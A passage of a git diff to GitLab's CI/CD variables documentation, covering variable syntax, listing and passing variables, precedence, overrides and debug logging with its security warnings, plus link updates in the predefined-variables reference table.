cases](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4115#note_157692820) +environment variables might need to be surrounded by quotes to expand properly: + +```yaml +job_name: + script: + - D:\\qislsf\\apache-ant-1.10.5\\bin\\ant.bat "-DsosposDailyUsr=$env:SOSPOS_DAILY_USR" portal_test +``` + +### Use variables with Windows Batch + +To access CI/CD variables in Windows Batch, surround the variable +with `%`: + +```yaml +job_name: + script: + - echo %CI_JOB_ID% +``` + +You can also surround the variable with `!` for [delayed expansion](https://ss64.com/nt/delayedexpansion.html). +Delayed expansion might be needed for variables that contain white spaces or newlines. + +```yaml +job_name: + script: + - echo !ERROR_MESSAGE! +``` + +### List all environment variables + +You can list all environment variables available to a script with the `export` command +in Bash or `dir env:` in PowerShell. This exposes the values of **all** available +variables, which can be a [security risk](#cicd-variable-security). +[Masked variables](#mask-a-cicd-variable) display as `[masked]`. + +For example: + +```yaml +job_name: + script: + - export + # - 'dir env:' # Use this for PowerShell +``` + +Example job log output: + +```shell +export CI_JOB_ID="50" +export CI_COMMIT_SHA="1ecfd275763eff1d6b4844ea3168962458c9f27a" +export CI_COMMIT_SHORT_SHA="1ecfd275" +export CI_COMMIT_REF_NAME="main" +export CI_REPOSITORY_URL="https://gitlab-ci-token:[masked]@example.com/gitlab-org/gitlab-foss.git" +export CI_COMMIT_TAG="1.0.0" +export CI_JOB_NAME="spec:other" +export CI_JOB_STAGE="test" +export CI_JOB_MANUAL="true" +export CI_JOB_TRIGGERED="true" +export CI_JOB_TOKEN="[masked]" +export CI_PIPELINE_ID="1000" +export CI_PIPELINE_IID="10" +export CI_PAGES_DOMAIN="gitlab.io" +export CI_PAGES_URL="https://gitlab-org.gitlab.io/gitlab-foss" +export CI_PROJECT_ID="34" +export CI_PROJECT_DIR="/builds/gitlab-org/gitlab-foss" +export CI_PROJECT_NAME="gitlab-foss" +export CI_PROJECT_TITLE="GitLab FOSS" +export CI_PROJECT_NAMESPACE="gitlab-org" +export CI_PROJECT_ROOT_NAMESPACE="gitlab-org" +export CI_PROJECT_PATH="gitlab-org/gitlab-foss" +export CI_PROJECT_URL="https://example.com/gitlab-org/gitlab-foss" +export CI_REGISTRY="registry.example.com" +export CI_REGISTRY_IMAGE="registry.example.com/gitlab-org/gitlab-foss" +export CI_REGISTRY_USER="gitlab-ci-token" +export CI_REGISTRY_PASSWORD="[masked]" +export CI_RUNNER_ID="10" +export CI_RUNNER_DESCRIPTION="my runner" +export CI_RUNNER_TAGS="docker, linux" +export CI_SERVER="yes" +export CI_SERVER_URL="https://example.com" +export CI_SERVER_HOST="example.com" +export CI_SERVER_PORT="443" +export CI_SERVER_PROTOCOL="https" +export CI_SERVER_NAME="GitLab" +export CI_SERVER_REVISION="70606bf" +export CI_SERVER_VERSION="8.9.0" +export CI_SERVER_VERSION_MAJOR="8" +export CI_SERVER_VERSION_MINOR="9" +export CI_SERVER_VERSION_PATCH="0" +export GITLAB_USER_EMAIL="user@example.com" +export GITLAB_USER_ID="42" +... +``` + +## Pass an environment variable to another job + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/22638) in GitLab 13.0. +> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/217834) in GitLab 13.1. + +You can pass environment variables from one job to another job in a later stage. +These variables cannot be used as CI/CD variables to configure a pipeline, but +they can be used in job scripts. + +1. In the job script, save the variable as a `.env` file. +1. Save the `.env` file as an [`artifacts:reports:dotenv`](../yaml/index.md#artifactsreportsdotenv) +artifact. +1. Set a job in a later stage to receive the artifact by using the [`dependencies`](../yaml/index.md#dependencies) + or the [`needs`](../yaml/index.md#artifact-downloads-with-needs) keywords. +1. The later job can then [use the variable in scripts](#use-cicd-variables-in-job-scripts). + +For example, with the [`dependencies`](../yaml/index.md#dependencies) keyword: + +```yaml +build: + stage: build + script: + - echo "BUILD_VERSION=hello" >> build.env + artifacts: + reports: + dotenv: build.env + +deploy: + stage: deploy + script: + - echo "$BUILD_VERSION" # Output is: 'hello' + dependencies: + - build +``` + +For example, with the [`needs`](../yaml/index.md#artifact-downloads-with-needs) keyword: + +```yaml +build: + stage: build + script: + - echo "BUILD_VERSION=hello" >> build.env + artifacts: + reports: + dotenv: build.env + +deploy: + stage: deploy + script: + - echo "$BUILD_VERSION" # Output is: 'hello' + needs: + - job: build + artifacts: true +``` + +## CI/CD variable precedence + +You can use CI/CD variables with the same name in different places, but the values +can overwrite each other. The type of variable and where they are defined determines +which variables take precedence. + +The order of precedence for variables is (from highest to lowest): + +1. [Trigger variables](../triggers/index.md#making-use-of-trigger-variables), + [scheduled pipeline variables](../pipelines/schedules.md#using-variables), + and [manual pipeline run variables](#override-a-variable-when-running-a-pipeline-manually). +1. Project [variables](#custom-cicd-variables). +1. Group [variables](#add-a-cicd-variable-to-a-group). +1. Instance [variables](#add-a-cicd-variable-to-an-instance). +1. [Inherited variables](#pass-an-environment-variable-to-another-job). +1. Variables defined in jobs in the `.gitlab-ci.yml` file. +1. Variables defined outside of jobs (globally) in the `.gitlab-ci.yml` file. +1. [Deployment variables](#deployment-variables). +1. [Predefined variables](predefined_variables.md). + +In the following example, when the script in `job1` executes, the value of `API_TOKEN` is `secure`. +Variables defined in jobs have a higher precedence than variables defined globally. + +```yaml +variables: + API_TOKEN: "default" + +job1: + variables: + API_TOKEN: "secure" + script: + - echo "The variable value is $API_TOKEN" +``` + +## Override a defined CI/CD variable + +You can override the value of a variable when you: + +1. [Run a pipeline manually](#override-a-variable-when-running-a-pipeline-manually) in the UI. +1. Create a pipeline by using [the API](../../api/pipelines.md#create-a-new-pipeline). +1. Run a job manually in the UI. +1. Use [push options](../../user/project/push_options.md#push-options-for-gitlab-cicd). +1. Trigger a pipeline by using [the API](../triggers/index.md#making-use-of-trigger-variables). +1. Pass variables to a downstream pipeline [by using the `variable` keyword](../pipelines/multi_project_pipelines.md#pass-cicd-variables-to-a-downstream-pipeline-by-using-the-variables-keyword) + or [by using variable inheritance](../pipelines/multi_project_pipelines.md#pass-cicd-variables-to-a-downstream-pipeline-by-using-variable-inheritance). + +The pipeline variables declared in these events take [priority over other variables](#cicd-variable-precedence). + +### Override a variable when running a pipeline manually + +You can override the value of a CI/CD variable when you +[run a pipeline manually](../pipelines/index.md#run-a-pipeline-manually). + +1. Go to your project's **CI/CD > Pipelines** and select **Run pipeline**. +1. Choose the branch you want to run the pipeline for. +1. Input the variable and its value in the UI. + +### Restrict who can override variables + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/295234) in GitLab 13.8. + +You can grant permission to override variables to [maintainers](../../user/permissions.md#project-features) only. When other users try to run a pipeline +with overridden variables, they receive the `Insufficient permissions to set pipeline variables` +error message. + +If you [store your CI/CD configurations in a different repository](../../ci/pipelines/settings.md#specify-a-custom-cicd-configuration-file), +use this setting for control over the environment the pipeline runs in. + +You can enable this feature by using [the projects API](../../api/projects.md#edit-project) +to enable the `restrict_user_defined_variables` setting. The setting is `disabled` by default. + +## Limit the environment scope of a CI/CD variable + +By default, all CI/CD variables are available to any job in a pipeline. Therefore, if a project uses a +compromised tool in a test job, it could expose all CI/CD variables that a deployment job used. This is +a common scenario in supply chain attacks. GitLab helps mitigate supply chain attacks by limiting +the environment scope of a variable. GitLab does this by +[defining which environments and corresponding jobs](../environments/index.md) +the variable can be available for. + +To learn more about scoping environments, see [Scoping environments with specs](../environments/index.md#scoping-environments-with-specs). + +To learn more about ensuring CI/CD variables are only exposed in pipelines running from protected +branches or tags, see [Protect a CI/CD Variable](#protect-a-cicd-variable). + +## Deployment variables + +Integrations that are responsible for deployment configuration can define their own +variables that are set in the build environment. These variables are only defined +for [deployment jobs](../environments/index.md). + +For example, the [Kubernetes integration](../../user/project/clusters/deploy_to_cluster.md#deployment-variables) +defines deployment variables that you can use with the integration. + +The [documentation for each integration](../../user/project/integrations/overview.md) +explains if the integration has any deployment variables available. + +## Auto DevOps environment variables + +> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/49056) in GitLab 11.7. + +You can configure [Auto DevOps](../../topics/autodevops/index.md) to pass CI/CD variables +to a running application. + +To make a CI/CD variable available as an environment variable in the running application's container, +[prefix the variable key](../../topics/autodevops/customize.md#application-secret-variables) +with `K8S_SECRET_`. + +CI/CD variables with multi-line values are not supported. + +## Debug logging + +> Introduced in GitLab Runner 1.7. + +WARNING: +Debug logging can be a serious security risk. The output contains the content of +all variables and other secrets available to the job. The output is uploaded to the +GitLab server and visible in job logs. + +You can use debug logging to help troubleshoot problems with pipeline configuration +or job scripts. Debug logging exposes job execution details that are usually hidden +by the runner and makes job logs more verbose. It also exposes all variables and secrets +available to the job. + +Before you enable debug logging, make sure only [team members](../../user/permissions.md#project-features) +can view job logs. You should also [delete job logs](../jobs/index.md#view-jobs-in-a-pipeline) +with debug output before you make logs public again. + +### Enable Debug logging + +To enable debug logging (tracing), set the `CI_DEBUG_TRACE` variable to `true`: + +```yaml +job_name: + variables: + CI_DEBUG_TRACE: "true" +``` + +Example output (truncated): + +```shell +... +export CI_SERVER_TLS_CA_FILE="/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE" +if [[ -d "/builds/gitlab-examples/ci-debug-trace/.git" ]]; then + echo $'\''\x1b[32;1mFetching changes...\x1b[0;m'\'' + $'\''cd'\'' "/builds/gitlab-examples/ci-debug-trace" + $'\''git'\'' "config" "fetch.recurseSubmodules" "false" + $'\''rm'\'' "-f" ".git/index.lock" + $'\''git'\'' "clean" "-ffdx" + $'\''git'\'' "reset" "--hard" + $'\''git'\'' "remote" "set-url" "origin" "https://gitlab-ci-token:xxxxxxxxxxxxxxxxxxxx@example.com/gitlab-examples/ci-debug-trace.git" + $'\''git'\'' "fetch" "origin" "--prune" "+refs/heads/*:refs/remotes/origin/*" "+refs/tags/*:refs/tags/lds" +++ CI_BUILDS_DIR=/builds +++ export CI_PROJECT_DIR=/builds/gitlab-examples/ci-debug-trace +++ CI_PROJECT_DIR=/builds/gitlab-examples/ci-debug-trace +++ export CI_CONCURRENT_ID=87 +++ CI_CONCURRENT_ID=87 +++ export CI_CONCURRENT_PROJECT_ID=0 +++ CI_CONCURRENT_PROJECT_ID=0 +++ export CI_SERVER=yes +++ CI_SERVER=yes +++ mkdir -p /builds/gitlab-examples/ci-debug-trace.tmp +++ echo -n '-----BEGIN CERTIFICATE----- +-----END CERTIFICATE-----' +++ export CI_SERVER_TLS_CA_FILE=/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE +++ CI_SERVER_TLS_CA_FILE=/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE +++ export CI_PIPELINE_ID=52666 +++ CI_PIPELINE_ID=52666 +++ export CI_PIPELINE_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/pipelines/52666 +++ CI_PIPELINE_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/pipelines/52666 +++ export CI_JOB_ID=7046507 +++ CI_JOB_ID=7046507 +++ export CI_JOB_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/-/jobs/379424655 +++ CI_JOB_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/-/jobs/379424655 +++ export CI_JOB_TOKEN=[MASKED] +++ CI_JOB_TOKEN=[MASKED] +++ export CI_REGISTRY_USER=gitlab-ci-token +++ CI_REGISTRY_USER=gitlab-ci-token +++ export CI_REGISTRY_PASSWORD=[MASKED] +++ CI_REGISTRY_PASSWORD=[MASKED] +++ export CI_REPOSITORY_URL=https://gitlab-ci-token:[MASKED]@gitlab.com/gitlab-examples/ci-debug-trace.git +++ CI_REPOSITORY_URL=https://gitlab-ci-token:[MASKED]@gitlab.com/gitlab-examples/ci-debug-trace.git +++ export CI_JOB_NAME=debug_trace +++ CI_JOB_NAME=debug_trace +++ export CI_JOB_STAGE=test +++ CI_JOB_STAGE=test +++ export CI_NODE_TOTAL=1 +++ CI_NODE_TOTAL=1 +++ export CI=true +++ CI=true +++ export GITLAB_CI=true +++ GITLAB_CI=true +++ export CI_SERVER_URL=https://gitlab.com:3000 +++ CI_SERVER_URL=https://gitlab.com:3000 +++ export CI_SERVER_HOST=gitlab.com +++ CI_SERVER_HOST=gitlab.com +++ export CI_SERVER_PORT=3000 +++ CI_SERVER_PORT=3000 +++ export CI_SERVER_PROTOCOL=https +++ CI_SERVER_PROTOCOL=https +++ export CI_SERVER_NAME=GitLab +++ CI_SERVER_NAME=GitLab +++ export GITLAB_FEATURES=audit_events,burndown_charts,code_owners,contribution_analytics,description_diffs,elastic_search,group_bulk_edit,group_burndown_charts,group_webhooks,issuable_default_templates,issue_weights,jenkins_integration,ldap_group_sync,member_lock,merge_request_approvers,multiple_issue_assignees,multiple_ldap_servers,multiple_merge_request_assignees,protected_refs_for_users,push_rules,related_issues,repository_mirrors,repository_size_limit,scoped_issue_board,usage_quotas,visual_review_app,wip_limits,adjourned_deletion_for_projects_and_groups,admin_audit_log,auditor_user,batch_comments,blocking_merge_requests,board_assignee_lists,board_milestone_lists,ci_cd_projects,cluster_deployments,code_analytics,code_owner_approval_required,commit_committer_check,cross_project_pipelines,custom_file_templates,custom_file_templates_for_namespace,custom_project_templates,custom_prometheus_metrics,cycle_analytics_for_groups,db_load_balancing,default_project_deletion_protection,dependency_proxy,deploy_board,design_management,email_additional_text,extended_audit_events,external_authorization_service_api_management,feature_flags,file_locks,geo,github_project_service_integration,group_allowed_email_domains,group_project_templates,group_saml,issues_analytics,jira_dev_panel_integration,ldap_group_sync_filter,merge_pipelines,merge_request_performance_metrics,merge_trains,metrics_reports,multiple_approval_rules,multiple_group_issue_boards,object_storage,operations_dashboard,packages,productivity_analytics,project_aliases,protected_environments,reject_unsigned_commits,required_ci_templates,scoped_labels,service_desk,smartcard_auth,group_timelogs,type_of_work_analytics,unprotection_restrictions,ci_project_subscriptions,container_scanning,dast,dependency_scanning,epics,group_ip_restriction,incident_management,insights,license_management,personal_access_token_expiration_policy,pod_logs,prometheus_alerts,pseudonymizer,report_approver_rules,sast,security_dashboard,tracing,web_ide_terminal +++ GITLAB_FEATURES=audit_events,burndown_charts,code_owners,contribution_analytics,description_diffs,elastic_search,group_bulk_edit,group_burndown_charts,group_webhooks,issuable_default_templates,issue_weights,jenkins_integration,ldap_group_sync,member_lock,merge_request_approvers,multiple_issue_assignees,multiple_ldap_servers,multiple_merge_request_assignees,protected_refs_for_users,push_rules,related_issues,repository_mirrors,repository_size_limit,scoped_issue_board,usage_quotas,visual_review_app,wip_limits,adjourned_deletion_for_projects_and_groups,admin_audit_log,auditor_user,batch_comments,blocking_merge_requests,board_assignee_lists,board_milestone_lists,ci_cd_projects,cluster_deployments,code_analytics,code_owner_approval_required,commit_committer_check,cross_project_pipelines,custom_file_templates,custom_file_templates_for_namespace,custom_project_templates,custom_prometheus_metrics,cycle_analytics_for_groups,db_load_balancing,default_project_deletion_protection,dependency_proxy,deploy_board,design_management,email_additional_text,extended_audit_events,external_authorization_service_api_management,feature_flags,file_locks,geo,github_project_service_integration,group_allowed_email_domains,group_project_templates,group_saml,issues_analytics,jira_dev_panel_integration,ldap_group_sync_filter,merge_pipelines,merge_request_performance_metrics,merge_trains,metrics_reports,multiple_approval_rules,multiple_group_issue_boards,object_storage,operations_dashboard,packages,productivity_analytics,project_aliases,protected_environments,reject_unsigned_commits,required_ci_templates,scoped_labels,service_desk,smartcard_auth,group_timelogs,type_of_work_analytics,unprotection_restrictions,ci_project_subscriptions,cluster_health,container_scanning,dast,dependency_scanning,epics,group_ip_restriction,incident_management,insights,license_management,personal_access_token_expiration_policy,pod_logs,prometheus_alerts,pseudonymizer,report_approver_rules,sast,security_dashboard,tracing,web_ide_terminal +++ export CI_PROJECT_ID=17893 +++ CI_PROJECT_ID=17893 +++ export CI_PROJECT_NAME=ci-debug-trace +++ CI_PROJECT_NAME=ci-debug-trace +++ export CI_PROJECT_TITLE='GitLab FOSS' +++ CI_PROJECT_TITLE='GitLab FOSS' +++ export CI_PROJECT_PATH=gitlab-examples/ci-debug-trace +++ CI_PROJECT_PATH=gitlab-examples/ci-debug-trace +++ export CI_PROJECT_PATH_SLUG=gitlab-examples-ci-debug-trace +++ CI_PROJECT_PATH_SLUG=gitlab-examples-ci-debug-trace +++ export CI_PROJECT_NAMESPACE=gitlab-examples +++ CI_PROJECT_NAMESPACE=gitlab-examples +++ export CI_PROJECT_ROOT_NAMESPACE=gitlab-examples +++ CI_PROJECT_ROOT_NAMESPACE=gitlab-examples +++ export CI_PROJECT_URL=https://gitlab.com/gitlab-examples/ci-debug-trace +++ CI_PROJECT_URL=https://gitlab.com/gitlab-examples/ci-debug-trace +++ export CI_PROJECT_VISIBILITY=public +++ CI_PROJECT_VISIBILITY=public +++ export CI_PROJECT_REPOSITORY_LANGUAGES= +++ CI_PROJECT_REPOSITORY_LANGUAGES= +++ export CI_DEFAULT_BRANCH=main +++ CI_DEFAULT_BRANCH=main +++ export CI_REGISTRY=registry.gitlab.com +++ CI_REGISTRY=registry.gitlab.com +++ export CI_API_V4_URL=https://gitlab.com/api/v4 +++ CI_API_V4_URL=https://gitlab.com/api/v4 +++ export CI_PIPELINE_IID=123 +++ CI_PIPELINE_IID=123 +++ export CI_PIPELINE_SOURCE=web +++ CI_PIPELINE_SOURCE=web +++ export CI_CONFIG_PATH=.gitlab-ci.yml +++ CI_CONFIG_PATH=.gitlab-ci.yml +++ export CI_COMMIT_SHA=dd648b2e48ce6518303b0bb580b2ee32fadaf045 +++ CI_COMMIT_SHA=dd648b2e48ce6518303b0bb580b2ee32fadaf045 +++ export CI_COMMIT_SHORT_SHA=dd648b2e +++ CI_COMMIT_SHORT_SHA=dd648b2e +++ export CI_COMMIT_BEFORE_SHA=0000000000000000000000000000000000000000 +++ CI_COMMIT_BEFORE_SHA=0000000000000000000000000000000000000000 +++ export CI_COMMIT_REF_NAME=main +++ CI_COMMIT_REF_NAME=main +++ export CI_COMMIT_REF_SLUG=main +++ CI_COMMIT_REF_SLUG=main +... +``` + +### Restrict access to debug logging + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/213159) in GitLab 13.7. +> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/292661) in GitLab 13.8. + +You can restrict access to debug logging. When restricted, only users with +[developer or higher permissions](../../user/permissions.md#project-members-permissions) +can view job logs when debug logging is enabled with a variable in: + +- The [`.gitlab-ci.yml` file](#create-a-custom-cicd-variable-in-the-gitlab-ciyml-file). +- The CI/CD variables set in the GitLab UI. + +WARNING: +If you add `CI_DEBUG_TRACE` as a local variable to runners, debug logs generate and are visible +to all users with access to job logs. The permission levels are not checked by the runner, +so you should only use the variable in GitLab itself. + +## Video walkthrough of a working example + +The [Managing the Complex Configuration Data Management Monster Using GitLab](https://www.youtube.com/watch?v=v4ZOJ96hAck) +video is a walkthrough of the [Complex Configuration Data Monorepo](https://gitlab.com/guided-explorations/config-data-top-scope/config-data-subscope/config-data-monorepo) +working example project. It explains how multiple levels of group CI/CD variables +can be combined with environment-scoped project variables for complex configuration +of application builds or deployments. + +The example can be copied to your own group or instance for testing. More details +on what other GitLab CI patterns are demonstrated are available at the project page. diff --git a/doc/ci/variables/predefined_variables.md b/doc/ci/variables/predefined_variables.md index bd280cc4825..b6dd9446644 100644 --- a/doc/ci/variables/predefined_variables.md +++ b/doc/ci/variables/predefined_variables.md @@ -7,14 +7,14 @@ type: reference # Predefined variables reference **(FREE)** -Predefined [CI/CD variables](README.md) are available in every GitLab CI/CD pipeline. +Predefined [CI/CD variables](index.md) are available in every GitLab CI/CD pipeline. Some variables are only available with more recent versions of [GitLab Runner](https://docs.gitlab.com/runner/). -You can [output the values of all variables available for a job](README.md#list-all-environment-variables) +You can [output the values of all variables available for a job](index.md#list-all-environment-variables) with a `script` command. -There are also [Kubernetes-specific deployment variables](../../user/project/clusters/index.md#deployment-variables). +There are also [Kubernetes-specific deployment variables](../../user/project/clusters/deploy_to_cluster.md#deployment-variables). | Variable | GitLab | Runner | Description | |------------------------------------------|--------|--------|-------------| @@ -39,7 +39,7 @@ There are also [Kubernetes-specific deployment variables](../../user/project/clu | `CI_CONCURRENT_ID` | all | 11.10 | The unique ID of build execution in a single executor. | | `CI_CONCURRENT_PROJECT_ID` | all | 11.10 | The unique ID of build execution in a single executor and project. | | `CI_CONFIG_PATH` | 9.4 | 0.5 | The path to the CI/CD configuration file. Defaults to `.gitlab-ci.yml`. | -| `CI_DEBUG_TRACE` | all | 1.7 | `true` if [debug logging (tracing)](README.md#debug-logging) is enabled. | +| `CI_DEBUG_TRACE` | all | 1.7 | `true` if [debug logging (tracing)](index.md#debug-logging) is enabled. | | `CI_DEFAULT_BRANCH` | 12.4 | all | The name of the project's default branch. | | `CI_DEPENDENCY_PROXY_GROUP_IMAGE_PREFIX` | 13.7 | all | The image prefix for pulling images through the Dependency Proxy. | | `CI_DEPENDENCY_PROXY_PASSWORD` | 13.7 | all | The password to pull images through the Dependency Proxy. | @@ -49,10 +49,10 @@ There are also [Kubernetes-specific deployment variables](../../user/project/clu | `CI_DEPLOY_PASSWORD` | 10.8 | all | The authentication password of the [GitLab Deploy Token](../../user/project/deploy_tokens/index.md#gitlab-deploy-token), if the project has one. | | `CI_DEPLOY_USER` | 10.8 | all | The authentication username of the [GitLab Deploy Token](../../user/project/deploy_tokens/index.md#gitlab-deploy-token), if the project has one. | | `CI_DISPOSABLE_ENVIRONMENT` | all | 10.1 | Only available if the job is executed in a disposable environment (something that is created only for this job and disposed of/destroyed after the execution - all executors except `shell` and `ssh`). `true` when available. | -| `CI_ENVIRONMENT_NAME` | 8.15 | all | The name of the environment for this job. Available if [`environment:name`](../yaml/README.md#environmentname) is set. | -| `CI_ENVIRONMENT_SLUG` | 8.15 | all | The simplified version of the environment name, suitable for inclusion in DNS, URLs, Kubernetes labels, and so on. Available if [`environment:name`](../yaml/README.md#environmentname) is set. The slug is [truncated to 24 characters](https://gitlab.com/gitlab-org/gitlab/-/issues/20941). | -| `CI_ENVIRONMENT_URL` | 9.3 | all | The URL of the environment for this job. Available if [`environment:url`](../yaml/README.md#environmenturl) is set. | -| `CI_ENVIRONMENT_ACTION` | 13.11 | all | The action annotation specified for this job's environment. Available if [`environment:action`](../yaml/README.md#environmentaction) is set. Can be `start`, `prepare`, or `stop`. | +| `CI_ENVIRONMENT_NAME` | 8.15 | all | The name of the environment for this job. Available if [`environment:name`](../yaml/index.md#environmentname) is set. | +| `CI_ENVIRONMENT_SLUG` | 8.15 | all | The simplified version of the environment name, suitable for inclusion in DNS, URLs, Kubernetes labels, and so on. Available if [`environment:name`](../yaml/index.md#environmentname) is set. The slug is [truncated to 24 characters](https://gitlab.com/gitlab-org/gitlab/-/issues/20941). | +| `CI_ENVIRONMENT_URL` | 9.3 | all | The URL of the environment for this job. Available if [`environment:url`](../yaml/index.md#environmenturl) is set. | +| `CI_ENVIRONMENT_ACTION` | 13.11 | all | The action annotation specified for this job's environment. Available if [`environment:action`](../yaml/index.md#environmentaction) is set. Can be `start`, `prepare`, or `stop`. | | `CI_ENVIRONMENT_TIER` | 14.0 | all | The [deployment tier of the environment](../environments/index.md#deployment-tier-of-environments) for this job. | | `CI_HAS_OPEN_REQUIREMENTS` | 13.1 | all | Only available if the pipeline's project has an open [requirement](../../user/project/requirements/index.md). `true` when available. | | `CI_JOB_ID` | 9.0 | all | The internal ID of the job, unique across all jobs in the GitLab instance. | @@ -61,20 +61,20 @@ There are also [Kubernetes-specific deployment variables](../../user/project/clu | `CI_JOB_MANUAL` | 8.12 | all | `true` if a job was started manually. | | `CI_JOB_NAME` | 9.0 | 0.5 | The name of the job. | | `CI_JOB_STAGE` | 9.0 | 0.5 | The name of the job's stage. | -| `CI_JOB_STATUS` | all | 13.5 | The status of the job as each runner stage is executed. Use with [`after_script`](../yaml/README.md#after_script). Can be `success`, `failed`, or `canceled`. | -| `CI_JOB_TOKEN` | 9.0 | 1.2 | A token to authenticate with [certain API endpoints](../../api/README.md#gitlab-cicd-job-token). The token is valid as long as the job is running. | +| `CI_JOB_STATUS` | all | 13.5 | The status of the job as each runner stage is executed. Use with [`after_script`](../yaml/index.md#after_script). Can be `success`, `failed`, or `canceled`. | +| `CI_JOB_TOKEN` | 9.0 | 1.2 | A token to authenticate with [certain API endpoints](../../api/index.md#gitlab-cicd-job-token). The token is valid as long as the job is running. | | `CI_JOB_URL` | 11.1 | 0.5 | The job details URL. | | `CI_JOB_STARTED_AT` | 13.10 | all | The UTC datetime when a job started, in [ISO 8601](https://tools.ietf.org/html/rfc3339#appendix-A) format. | | `CI_KUBERNETES_ACTIVE` | 13.0 | all | Only available if the pipeline has a Kubernetes cluster available for deployments. `true` when available. | -| `CI_NODE_INDEX` | 11.5 | all | The index of the job in the job set. Only available if the job uses [`parallel`](../yaml/README.md#parallel). | -| `CI_NODE_TOTAL` | 11.5 | all | The total number of instances of this job running in parallel. Set to `1` if the job does not use [`parallel`](../yaml/README.md#parallel). | +| `CI_NODE_INDEX` | 11.5 | all | The index of the job in the job set. Only available if the job uses [`parallel`](../yaml/index.md#parallel). | +| `CI_NODE_TOTAL` | 11.5 | all | The total number of instances of this job running in parallel. Set to `1` if the job does not use [`parallel`](../yaml/index.md#parallel). | | `CI_OPEN_MERGE_REQUESTS` | 13.8 | all | A comma-separated list of up to four merge requests that use the current branch and project as the merge request source. Only available in branch and merge request pipelines if the branch has an associated merge request. For example, `gitlab-org/gitlab!333,gitlab-org/gitlab-foss!11`. | | `CI_PAGES_DOMAIN` | 11.8 | all | The configured domain that hosts GitLab Pages. | | `CI_PAGES_URL` | 11.8 | all | The URL for a GitLab Pages site. Always a subdomain of `CI_PAGES_DOMAIN`. | | `CI_PIPELINE_ID` | 8.10 | all | The instance-level ID of the current pipeline. This ID is unique across all projects on the GitLab instance. | | `CI_PIPELINE_IID` | 11.0 | all | The project-level IID (internal ID) of the current pipeline. This ID is unique only within the current project. | -| `CI_PIPELINE_SOURCE` | 10.0 | all | How the pipeline was triggered. Can be `push`, `web`, `schedule`, `api`, `external`, `chat`, `webide`, `merge_request_event`, `external_pull_request_event`, `parent_pipeline`, [`trigger`, or `pipeline`](../triggers/README.md#authentication-tokens). | -| `CI_PIPELINE_TRIGGERED` | all | all | `true` if the job was [triggered](../triggers/README.md). | +| `CI_PIPELINE_SOURCE` | 10.0 | all | How the pipeline was triggered. Can be `push`, `web`, `schedule`, `api`, `external`, `chat`, `webide`, `merge_request_event`, `external_pull_request_event`, `parent_pipeline`, [`trigger`, or `pipeline`](../triggers/index.md#authentication-tokens). | +| `CI_PIPELINE_TRIGGERED` | all | all | `true` if the job was [triggered](../triggers/index.md). | | `CI_PIPELINE_URL` | 11.1 | 0.5 | The URL for the pipeline details. | | `CI_PIPELINE_CREATED_AT` | 13.10 | all | The UTC datetime when the pipeline was created, in [ISO 8601](https://tools.ietf.org/html/rfc3339#appendix-A) format. | | `CI_PROJECT_CONFIG_PATH` | 13.8 to 13.12 | all | [Removed](https://gitlab.com/gitlab-org/gitlab/-/issues/322807) in GitLab 14.0. Use `CI_CONFIG_PATH`. | @@ -119,17 +119,18 @@ There are also [Kubernetes-specific deployment variables](../../user/project/clu | `GITLAB_USER_ID` | 8.12 | all | The ID of the user who started the job. | | `GITLAB_USER_LOGIN` | 10.0 | all | The username of the user who started the job. | | `GITLAB_USER_NAME` | 10.0 | all | The name of the user who started the job. | -| `TRIGGER_PAYLOAD` | 13.9 | all | The webhook payload. Only available when a pipeline is [triggered with a webhook](../triggers/README.md#using-webhook-payload-in-the-triggered-pipeline). | +| `TRIGGER_PAYLOAD` | 13.9 | all | The webhook payload. Only available when a pipeline is [triggered with a webhook](../triggers/index.md#using-webhook-payload-in-the-triggered-pipeline). | ## Predefined variables for merge request pipelines These variables are available when: -- The pipelines [are merge request pipelines](../merge_request_pipelines/index.md). +- The pipelines [are merge request pipelines](../pipelines/merge_request_pipelines.md). - The merge request is open. | Variable | GitLab | Runner | Description | |----------------------------------------|--------|--------|-------------| +| `CI_MERGE_REQUEST_APPROVED` | 14.1 | all | Approval status of the merge request. `true` when [merge request approvals](../../user/project/merge_requests/approvals/index.md) is available and the merge request has been approved. | | `CI_MERGE_REQUEST_ASSIGNEES` | 11.9 | all | Comma-separated list of usernames of assignees for the merge request. | | `CI_MERGE_REQUEST_ID` | 11.6 | all | The instance-level ID of the merge request. This is a unique ID across all projects on GitLab. | | `CI_MERGE_REQUEST_IID` | 11.6 | all | The project-level IID (internal ID) of the merge request. This ID is unique for the current project. | @@ -140,12 +141,12 @@ These variables are available when: | `CI_MERGE_REQUEST_PROJECT_URL` | 11.6 | all | The URL of the project of the merge request. For example, `http://192.168.10.15:3000/namespace/awesome-project`. | | `CI_MERGE_REQUEST_REF_PATH` | 11.6 | all | The ref path of the merge request. For example, `refs/merge-requests/1/head`. | | `CI_MERGE_REQUEST_SOURCE_BRANCH_NAME` | 11.6 | all | The source branch name of the merge request. | -| `CI_MERGE_REQUEST_SOURCE_BRANCH_SHA` | 11.9 | all | The HEAD SHA of the source branch of the merge request. The variable is empty in merge request pipelines. The SHA is present only in [merged results pipelines](../merge_request_pipelines/pipelines_for_merged_results/index.md). **(PREMIUM)** | +| `CI_MERGE_REQUEST_SOURCE_BRANCH_SHA` | 11.9 | all | The HEAD SHA of the source branch of the merge request. The variable is empty in merge request pipelines. The SHA is present only in [merged results pipelines](../pipelines/pipelines_for_merged_results.md). **(PREMIUM)** | | `CI_MERGE_REQUEST_SOURCE_PROJECT_ID` | 11.6 | all | The ID of the source project of the merge request. | | `CI_MERGE_REQUEST_SOURCE_PROJECT_PATH` | 11.6 | all | The path of the source project of the merge request. | | `CI_MERGE_REQUEST_SOURCE_PROJECT_URL` | 11.6 | all | The URL of the source project of the merge request. | | 